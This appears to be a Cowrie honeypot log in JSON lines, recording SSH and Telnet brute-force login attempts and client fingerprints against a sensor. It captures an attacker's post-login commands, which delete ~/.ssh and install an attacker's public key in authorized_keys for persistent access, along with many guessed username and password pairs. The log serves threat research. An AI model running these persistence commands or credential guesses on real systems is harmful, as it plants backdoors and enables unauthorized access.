{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T15:21:53.623504Z","src_ip":"212.227.235.229","session":"0232fac33eeb"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu","message":"login attempt [ubuntu/ubuntu] failed","sensor":"my-vps","timestamp":"2025-08-28T15:21:53.922842Z","src_ip":"212.227.235.229","session":"0232fac33eeb"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:21:54.245322Z","src_ip":"212.227.235.229","session":"90fa5edb00f5"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:21:55.024513Z","src_ip":"212.227.235.229","session":"0232fac33eeb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58554,"dst_ip":"1.2.3.4","dst_port":22,"session":"31be2b5a0764","protocol":"ssh","message":"New connection: 212.227.125.160:58554 (1.2.3.4:22) [session: 31be2b5a0764]","sensor":"my-vps","timestamp":"2025-08-28T15:22:00.853885Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T15:22:00.854558Z","src_ip":"212.227.125.160","session":"31be2b5a0764"}
{"eventid":"cowrie.client.kex","hassh":"873a5fb5fedc2d4f8638ebde4abc6cfc","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 873a5fb5fedc2d4f8638ebde4abc6cfc","sensor":"my-vps","timestamp":"2025-08-28T15:22:00.969585Z","src_ip":"212.227.125.160","session":"31be2b5a0764"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53691,"dst_ip":"1.2.3.4","dst_port":22,"session":"c62b30946b42","protocol":"ssh","message":"New connection: 212.227.125.160:53691 (1.2.3.4:22) [session: c62b30946b42]","sensor":"my-vps","timestamp":"2025-08-28T15:22:12.108893Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T15:22:12.114849Z","src_ip":"212.227.125.160","session":"c62b30946b42"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T15:22:12.174323Z","src_ip":"212.227.125.160","session":"c62b30946b42"}
{"eventid":"cowrie.login.failed","username":"admin","password":"31031981","message":"login attempt [admin/31031981] failed","sensor":"my-vps","timestamp":"2025-08-28T15:22:12.454019Z","src_ip":"212.227.125.160","session":"c62b30946b42"}
{"eventid":"cowrie.login.failed","username":"admin","password":"30111984","message":"login attempt [admin/30111984] failed","sensor":"my-vps","timestamp":"2025-08-28T15:22:13.516006Z","src_ip":"212.227.125.160","session":"c62b30946b42"}
{"eventid":"cowrie.login.failed","username":"admin","password":"30101989","message":"login attempt [admin/30101989] failed","sensor":"my-vps","timestamp":"2025-08-28T15:22:14.578061Z","src_ip":"212.227.125.160","session":"c62b30946b42"}
{"eventid":"cowrie.login.failed","username":"admin","password":"30081991","message":"login attempt [admin/30081991] failed","sensor":"my-vps","timestamp":"2025-08-28T15:22:15.640575Z","src_ip":"212.227.125.160","session":"c62b30946b42"}
{"eventid":"cowrie.session.closed","duration":"15.0","message":"Connection lost after 15.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:22:15.855176Z","src_ip":"212.227.125.160","session":"31be2b5a0764"}
{"eventid":"cowrie.login.failed","username":"admin","password":"30011976","message":"login attempt [admin/30011976] failed","sensor":"my-vps","timestamp":"2025-08-28T15:22:16.704133Z","src_ip":"212.227.125.160","session":"c62b30946b42"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:22:17.766286Z","src_ip":"212.227.125.160","session":"c62b30946b42"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52874,"dst_ip":"1.2.3.4","dst_port":22,"session":"b74a3cd750e4","protocol":"ssh","message":"New connection: 212.227.235.229:52874 (1.2.3.4:22) [session: b74a3cd750e4]","sensor":"my-vps","timestamp":"2025-08-28T15:22:59.428626Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:22:59.429536Z","src_ip":"212.227.235.229","session":"b74a3cd750e4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:22:59.610789Z","src_ip":"212.227.235.229","session":"b74a3cd750e4"}
{"eventid":"cowrie.login.success","username":"root","password":"Erkan123","message":"login attempt [root/Erkan123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:23:00.376287Z","src_ip":"212.227.235.229","session":"b74a3cd750e4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:23:01.185137Z","src_ip":"212.227.235.229","session":"b74a3cd750e4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:23:01.185926Z","src_ip":"212.227.235.229","session":"b74a3cd750e4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:23:01.186948Z","src_ip":"212.227.235.229","session":"b74a3cd750e4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:23:01.369956Z","src_ip":"212.227.235.229","session":"b74a3cd750e4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:23:01.758716Z","src_ip":"212.227.235.229","session":"b74a3cd750e4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:23:01.759408Z","src_ip":"212.227.235.229","session":"b74a3cd750e4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:23:01.943221Z","src_ip":"212.227.235.229","session":"b74a3cd750e4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:23:01.944144Z","src_ip":"212.227.235.229","session":"b74a3cd750e4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53568,"dst_ip":"1.2.3.4","dst_port":22,"session":"93c3f8e72d91","protocol":"ssh","message":"New connection: 212.227.235.229:53568 (1.2.3.4:22) [session: 93c3f8e72d91]","sensor":"my-vps","timestamp":"2025-08-28T15:23:02.123941Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:23:02.124950Z","src_ip":"212.227.235.229","session":"93c3f8e72d91"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:23:02.307766Z","src_ip":"212.227.235.229","session":"93c3f8e72d91"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:23:03.078956Z","src_ip":"212.227.235.229","session":"93c3f8e72d91"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:23:04.264192Z","src_ip":"212.227.235.229","session":"93c3f8e72d91"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54794,"dst_ip":"1.2.3.4","dst_port":22,"session":"e780bc660cda","protocol":"ssh","message":"New connection: 212.227.235.229:54794 (1.2.3.4:22) [session: e780bc660cda]","sensor":"my-vps","timestamp":"2025-08-28T15:23:04.442336Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:23:04.443115Z","src_ip":"212.227.235.229","session":"e780bc660cda"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:23:04.622724Z","src_ip":"212.227.235.229","session":"e780bc660cda"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:23:05.380085Z","src_ip":"212.227.235.229","session":"e780bc660cda"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:23:05.560944Z","src_ip":"212.227.235.229","session":"e780bc660cda"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:23:05.562624Z","src_ip":"212.227.235.229","session":"b74a3cd750e4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35332,"dst_ip":"1.2.3.4","dst_port":22,"session":"2de74e3ceb2a","protocol":"ssh","message":"New connection: 212.227.235.229:35332 (1.2.3.4:22) [session: 2de74e3ceb2a]","sensor":"my-vps","timestamp":"2025-08-28T15:23:11.736407Z"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:23:12.460296Z","src_ip":"212.227.235.229","session":"2de74e3ceb2a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35334,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7ebc52a1194","protocol":"ssh","message":"New connection: 212.227.235.229:35334 (1.2.3.4:22) [session: c7ebc52a1194]","sensor":"my-vps","timestamp":"2025-08-28T15:23:13.640028Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T15:23:13.640837Z","src_ip":"212.227.235.229","session":"c7ebc52a1194"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T15:23:13.817837Z","src_ip":"212.227.235.229","session":"c7ebc52a1194"}
{"eventid":"cowrie.login.failed","username":"app","password":"123456","message":"login attempt [app/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T15:23:14.528249Z","src_ip":"212.227.235.229","session":"c7ebc52a1194"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:23:15.707375Z","src_ip":"212.227.235.229","session":"c7ebc52a1194"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51258,"dst_ip":"1.2.3.4","dst_port":22,"session":"9fba46bd3e25","protocol":"ssh","message":"New connection: 212.227.235.229:51258 (1.2.3.4:22) [session: 9fba46bd3e25]","sensor":"my-vps","timestamp":"2025-08-28T15:24:08.485599Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:24:08.486606Z","src_ip":"212.227.235.229","session":"9fba46bd3e25"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:24:08.669558Z","src_ip":"212.227.235.229","session":"9fba46bd3e25"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"secret123","message":"login attempt [ubuntu/secret123] failed","sensor":"my-vps","timestamp":"2025-08-28T15:24:09.441833Z","src_ip":"212.227.235.229","session":"9fba46bd3e25"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:24:10.626957Z","src_ip":"212.227.235.229","session":"9fba46bd3e25"}
{"eventid":"cowrie.session.connect","src_ip":"189.238.93.127","src_port":19304,"dst_ip":"1.2.3.4","dst_port":23,"session":"b49cf72b3298","protocol":"telnet","message":"New connection: 189.238.93.127:19304 (1.2.3.4:23) [session: b49cf72b3298]","sensor":"my-vps","timestamp":"2025-08-28T15:24:23.326643Z"}
{"eventid":"cowrie.session.closed","duration":13.662302494049072,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:24:36.988874Z","src_ip":"189.238.93.127","session":"b49cf72b3298"}
